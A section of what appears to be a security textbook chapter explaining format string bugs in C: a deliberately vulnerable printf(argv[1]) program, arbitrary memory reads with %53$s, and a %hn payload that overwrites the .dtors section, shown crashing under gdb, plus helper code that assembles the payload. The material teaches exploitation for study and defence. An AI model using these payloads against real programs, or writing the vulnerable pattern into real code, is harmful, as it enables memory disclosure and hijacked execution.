13.7 Format String Bugs

Buffer overflows aren't the only type of bug that can be used to take control of a process. Another fairly common programming error occurs when a user can control the format parameter passed to a function such as printf( ) or syslog( ). These functions take a format string as a parameter that describes how the other parameters should be interpreted.

For example, the string %d specifies that a parameter should be displayed as a signed decimal integer, while %s specifies that a parameter should be displayed as an ASCII string. Format strings give you a lot of control over how data is to be interpreted, and this control can sometimes be abused to read and write memory in arbitrary locations.

13.7.1 Reading Adjacent Items on the Stack

Example 13-11 shows a vulnerable C program, much like the printme program in Example 13-1.

Example 13-11. A simple C program containing a format string bug
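#include <stdio.h>

int main(int argc, char *argv[])
{
    if(argc < 2)
    {
        printf("You need to supply an argument\n");
        return 1;
    }

    /* Bug: user input is passed to printf( ) as the format string */
    printf(argv[1]);

    return 0;
}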


The program displays user-supplied input by using printf( ). Here is what happens when you supply normal data and a format specifier to the program:

# ./printf "Hello, world!"

Hello, world!

# ./printf %x


If you supply the %x format specifier, printf( ) displays the hexadecimal representation of an item on the stack. The item printed is, in fact, whatever occupies the position where the second argument to printf( ) would be (if one was supplied). Since no further arguments are passed, printf( ) reads and prints the 4-byte word immediately above the pointer to the format string on the stack. Figure 13-17 shows how the stack should look if a valid second argument is passed.

Figure 13-17. The printf( ) function's stack frame

Next, Figure 13-18 shows what the stack really looks like, as only one argument is passed in this case (the pointer to the format string).

Figure 13-18. The second argument doesn't really exist

printf( ) takes the next 4-byte word above the pointer to the format string and prints it, assuming it to be the second argument. If you use a number of %x specifiers, printf( ) displays more data from the stack, progressively working upwards through memory:

# ./printf %x.%x.%x.%x



So far, you can read as much of the stack above the printf( ) stack frame as you like. Next, I'll show how you can extend this ability to read from anywhere, write to anywhere, and redirect execution to wherever you choose.
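The way successive %x specifiers consume successive words can be modelled without touching a real stack. The following is a toy sketch only: walk_words( ) is a hypothetical helper, not part of the vulnerable program, and the array passed to it stands in for the memory above the printf( ) stack frame.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Toy model only: walks a caller-supplied array of 32-bit words the way
 * printf( ) walks its argument area, consuming one word per %x.
 * Returns the number of words consumed. Nothing here reads the real stack.
 */
size_t walk_words(const char *fmt, const uint32_t *words, size_t nwords,
                  char *out, size_t outlen)
{
    size_t next = 0;   /* index of the next "argument" word */
    size_t used = 0;   /* bytes written to out so far */

    assert(out != NULL && outlen > 0);
    out[0] = '\0';

    for (const char *p = fmt; *p != '\0' && used + 1 < outlen; p++) {
        if (p[0] == '%' && p[1] == 'x' && next < nwords) {
            int n = snprintf(out + used, outlen - used, "%x",
                             (unsigned)words[next++]);
            if (n < 0 || (size_t)n >= outlen - used) {
                break;              /* output buffer is full */
            }
            used += (size_t)n;
            p++;                    /* skip the 'x' */
        } else {
            out[used++] = *p;       /* ordinary character, copied as-is */
            out[used] = '\0';
        }
    }
    return next;
}
```

Calling walk_words("%x.%x.%x", words, 4, buf, sizeof buf) on an array of four made-up words consumes the first three, one per specifier, which mirrors how each extra %x moves one word further up the stack.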

13.7.2 Reading Data from Any Address on the Stack

In most cases, the buffer containing your format string is located on the stack. This means that it's located somewhere in memory not too far above the printf( ) stack frame and first argument. This also means that you can use the contents of the buffer as arguments to printf( ). Example 13-12 shows the string ABC, along with 55 %x specifiers, being passed to the vulnerable program.

Example 13-12. Using Perl to provide 55 %x specifiers
# ./printf ABC`perl -e 'print "%x." x 55;'`







In the example, you place ABC into a buffer (as a local variable in the main( ) stack frame) and look for it by stepping through the 55 words (220 bytes) above the first argument to printf( ). Near the end of the printed values is a string 43424100 (hexadecimal encoding of "CBA" along with the NULL terminator). This means that by using arguments 51 and onwards, you can access values entirely under your control, and use them as parameters to other format specifiers (such as %s). Figure 13-19 shows the main( ) and printf( ) stack frames during this %x reading attack.

Figure 13-19. Reading data from further up the stack

You can use this technique to read data from any memory address by instructing printf( ) to read a string pointed to by its fifty-third argument (in part of the main( ) buffer you control). You can place the address of the memory you wish to read and use the %s printf( ) specifier to display it.

You can use direct parameter access to tell printf( ) which argument you want to associate with a particular format specifier. %s is a standard format specifier that tells the function to print the next string on the stack. A specifier using direct parameter access looks like %7$s; it instructs printf( ) to print the string pointed to by its seventh argument.
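Direct parameter access can be tried safely with arguments that really exist. The sketch below assumes a C library that supports the POSIX numbered-argument syntax (it is not part of ISO C); swap_with_positions( ) is a hypothetical helper name.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Formats two strings in swapped order using POSIX numbered arguments:
 * %2$s selects the second variadic argument, %1$s the first.
 * Returns the snprintf( ) result (the length of the formatted text).
 */
int swap_with_positions(char *out, size_t outlen,
                        const char *first, const char *second)
{
    assert(out != NULL && outlen > 0);
    return snprintf(out, outlen, "%2$s %1$s", first, second);
}
```

Passing "world" and "hello" produces the text "hello world": the number before the $ picks the argument, regardless of the order in which the specifiers appear.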

After a little experimentation, you will discover that the end of the buffer is equivalent to the fifty-third argument, so the format string needs to look like this:

%53$s(padding)(address to read)

%53$s is the format specifier telling printf( ) to process the value at the fifty-third argument. The padding is needed to ensure that the address lies on an even word boundary, so that it may be used as an argument by printf( ).

In this case, I will try to read part of the example program's environment string table. I know the stack on my test system lives around address 0xbffff600, so I will try reading the string at address 0xbffff680. The following format string is passed:

%53$sAA\x80\xf6\xff\xbf


%53$s is the format specifier that tells printf( ) to process the value at the fifty-third argument. That argument is 0xbffff680 (aligned to an exact word by the AA padding), which, in turn, points near the beginning of the stack (where environment variables and such are defined).

Note that the memory address is reversed (in little endian format). Because this buffer contains some nonprintable characters, it is easiest to generate it with something like Perl. Here's what happens when I pass this string to the vulnerable program:

# ./printf `perl -e 'print "%53\$s" . "AA" . "\x80\xf6\xff\xbf"';`



The string at 0xbffff680 is displayed by the %s specifier. This is the TERM environment variable used by the program, followed by the AA padding and unprintable memory values. You can use this technique to display any value from memory.
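The reversed byte order of the address can be sketched as follows. pack_le32( ) is a hypothetical helper; it assumes a 32-bit little endian target such as the x86 test system used here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stores a 32-bit address least significant byte first (little endian). */
void pack_le32(uint32_t addr, unsigned char out[4])
{
    assert(out != NULL);
    out[0] = (unsigned char)(addr & 0xff);
    out[1] = (unsigned char)((addr >> 8) & 0xff);
    out[2] = (unsigned char)((addr >> 16) & 0xff);
    out[3] = (unsigned char)((addr >> 24) & 0xff);
}
```

For 0xbffff680 this yields the bytes 0x80, 0xf6, 0xff, 0xbf, which is the order in which they appear in the Perl string.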

13.7.3 Overwriting Any Word in Memory

To write to arbitrary memory locations using format strings, use the %n specifier. The printf(3) Unix manpage gives some insight into its use:

n     The number of characters written so far is stored into the

      integer indicated by the int * (or variant) pointer argument.

      No argument is converted.

By supplying a pointer to the memory you wish to overwrite and issuing the %n specifier, you write the number of characters that printf( ) has written so far directly to that memory address. This means that in order to write arbitrary memory to arbitrary locations, you have to be able to control the number of characters written by printf( ).
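The behavior of %n is easiest to see when it is given a legitimate pointer. This is a minimal sketch, assuming a C library that honors %n (glibc does for constant format strings; some platforms disable it); chars_before_n( ) is a hypothetical helper name.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Formats s and uses %n to record how many characters had been produced
 * at that point. The pointer argument is a real int *, so this is ordinary,
 * well-defined use of %n rather than an attack.
 */
int chars_before_n(const char *s)
{
    char buf[128];
    int count = -1;

    assert(s != NULL);
    /* The '!' after %n is not counted: %n records the total so far. */
    snprintf(buf, sizeof buf, "%s%n!", s, &count);
    return count;
}
```

In an attack, the only difference is where the pointer comes from: instead of &count, printf( ) picks up a word that the attacker has placed in the buffer.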

Luckily, the precision parameter of the format specifier allows you to control the number of characters written. The precision of a format specifier is provided in the following manner:

%.0(precision)x


To write 20 characters, use %.020x. Unfortunately, if you provide a huge precision (e.g., 0xbffff0c0), printf( ) takes a very long time to print all the zeroes. It is more efficient to write the value in two blocks of 2 bytes, using the %hn specifier, which writes a short (2 bytes) instead of an int (4 bytes).

If more than 0xffff bytes have been written, %hn writes only the least significant 2 bytes of the real value to the address. For example, you can write 0xf0c0 to the lowest 2 bytes of your target address, then print a further 0x1bfff - 0xf0c0 = 0xcf3f characters so that the running total is 0x1bfff, and write again to the highest 2 bytes of the target address. The second %hn stores only the low 2 bytes of that total, 0xbfff.
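Both the precision trick and the truncation performed by %hn can be observed with a valid pointer. The sketch below is an illustration under assumptions: count_via_hn( ) is a hypothetical helper, it uses %.*x (precision taken from an argument) instead of a literal such as %.020x, and it relies on the usual two's complement behavior when the count is stored into a short.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Emits `count` characters using a zero-padded precision, then stores the
 * running total with %hn. Passing NULL and 0 to snprintf( ) discards the
 * output, but the character count still advances.
 */
unsigned short count_via_hn(int count)
{
    short stored = 0;

    assert(count > 0);
    snprintf(NULL, 0, "%.*x%hn", count, 1u, &stored);
    return (unsigned short)stored;
}
```

With a count of 20 the stored value is 20. With a count of 0x1bfff, more than 0xffff characters have been produced, so only the low 2 bytes (0xbfff) are stored.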

Putting all this together, here's what the final format string must look like to overwrite an arbitrary word in memory:

%.0(pad 1)x%(arg number 1)$hn%.0(pad 2)x%(arg number 2)$hn(address 1)(address 2)(padding)

in which:

  • pad 1 is the lowest two bytes of the value you wish to write.

  • pad 2 is the highest two bytes of the value, minus pad 1.

  • arg number 1 is the offset from the first argument to address 1 in the buffer.

  • arg number 2 is the offset from the first argument to address 2 in the buffer.

  • address 1 is the address of the lowest two bytes of the word you wish to overwrite.

  • address 2 is address 1 + 2.

  • padding is between 0 and 4 bytes, to get the addresses on an even word boundary.
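The two pad values can be computed mechanically from the value to be written. This is a minimal sketch: split_for_hn( ) and struct hn_pads are hypothetical names, and the code ignores edge cases such as a pad of zero or characters already printed before the first specifier.

```c
#include <assert.h>
#include <stdint.h>

/* The two character counts needed to write a 32-bit value with two %hn. */
struct hn_pads {
    unsigned pad1;   /* characters printed before the first %hn */
    unsigned pad2;   /* characters printed between the two %hn  */
};

struct hn_pads split_for_hn(uint32_t value)
{
    struct hn_pads p;
    uint32_t low  = value & 0xffffu;   /* lowest two bytes  */
    uint32_t high = value >> 16;       /* highest two bytes */

    p.pad1 = low;
    /* Wrap modulo 0x10000 so the running total ends in `high`. */
    p.pad2 = (high - low) & 0xffffu;

    /* Sanity check: the low 2 bytes of the total must equal `high`. */
    assert(((p.pad1 + p.pad2) & 0xffffu) == high);
    return p;
}
```

For 0xbffff0c0 this gives 0xf0c0 and 0xcf3f. The masking step is what handles the case in which the highest two bytes are smaller than the lowest two.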

A sound approach is to overwrite the .dtors section of the vulnerable program with an address you control. The .dtors (destructors) section contains addresses of functions to be called when a program exits, so if you can write an address you control into that section, your shellcode will be executed when the program finishes.

Example 13-13 shows how to get the address of the start of the .dtors section from the binary using objdump.

Example 13-13. Using objdump to identify the .dtors section
# objdump -t printf | grep \.dtors

08049540 l    d  .dtors 00000000

08049540 l     O .dtors 00000000         __DTOR_LIST__

08048300 l     F .text  00000000         __do_global_dtors_aux

08049544 l     O .dtors 00000000         __DTOR_END__

Here, the .dtors section starts at 0x08049540. I will overwrite the first function address in the section, 4 bytes after the start, at 0x08049544. I will overwrite it with 0xdeadbeef for the purposes of this demonstration, so that the format string values are as follows:

  • pad 1 is set to 0xbeef (48879 in decimal).

  • pad 2 is set to 0xdead - 0xbeef = 0x1fbe (8126 in decimal).

  • arg number 1 is set to 114.

  • arg number 2 is set to 115.

  • address 1 is set to 0x08049544.

  • address 2 is set to 0x08049546.

The assembled format string is as follows:

%.048879x%114$hn%.08126x%115$hn\x44\x95\x04\x08\x46\x95\x04\x08A


Example 13-14 shows how, by running the program under gdb with a Perl-generated argument, you can confirm that the program crashes because the first value in the .dtors section has been overwritten with 0xdeadbeef.

Example 13-14. Using gdb to analyze the program crash
# gdb ./printf

GNU gdb 4.16.1

Copyright 1996 Free Software Foundation, Inc.

(gdb) run `perl -e 'print "%.048879x" . "%114\$hn" . "%.08126x" .

 "%115\$hn" . "\x44\x95\x04" . "\x08\x46\x95\x04\x08" . "A"';`







Program received signal SIGSEGV, Segmentation fault.

0xdeadbeef in ?? ( )
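The string passed to the program in Example 13-14 can also be assembled programmatically. The following sketch is illustrative only: build_hn_payload( ) is a hypothetical helper, it assumes a 32-bit little endian target, a single byte of padding, and that address 2 sits in the argument immediately after address 1.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Assembles "%.0<pad1>x%<arg1>$hn%.0<pad2>x%<arg1+1>$hn", then the two
 * little endian target addresses, then one 'A' of padding.
 * Returns the payload length, or 0 if it does not fit in out.
 */
size_t build_hn_payload(char *out, size_t outlen, uint32_t target,
                        uint32_t value, unsigned arg1)
{
    unsigned pad1 = value & 0xffffu;
    unsigned pad2 = ((value >> 16) - pad1) & 0xffffu;
    uint32_t addrs[2] = { target, target + 2 };
    size_t len;
    int n;

    assert(out != NULL);
    /* "%%" emits a literal '%'; "$hn" is copied through unchanged. */
    n = snprintf(out, outlen, "%%.0%ux%%%u$hn%%.0%ux%%%u$hn",
                 pad1, arg1, pad2, arg1 + 1);
    if (n < 0 || (size_t)n + 8 + 1 + 1 > outlen) {
        return 0;   /* no room for 8 address bytes, padding, and NUL */
    }
    len = strlen(out);
    for (int i = 0; i < 2; i++) {
        for (int shift = 0; shift < 32; shift += 8) {
            out[len++] = (char)((addrs[i] >> shift) & 0xff);
        }
    }
    out[len++] = 'A';
    out[len] = '\0';
    return len;
}
```

With a target of 0x08049544, a value of 0xdeadbeef, and a first argument number of 114, the result is the same 40-byte string that the Perl one-liner prints. Addresses that contain a zero byte would need different handling, because the string is passed as a command-line argument.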

13.7.4 Recommended Format String Bug Reading

If you would like more information about the various techniques that can exploit format string bugs, I recommend the following online papers: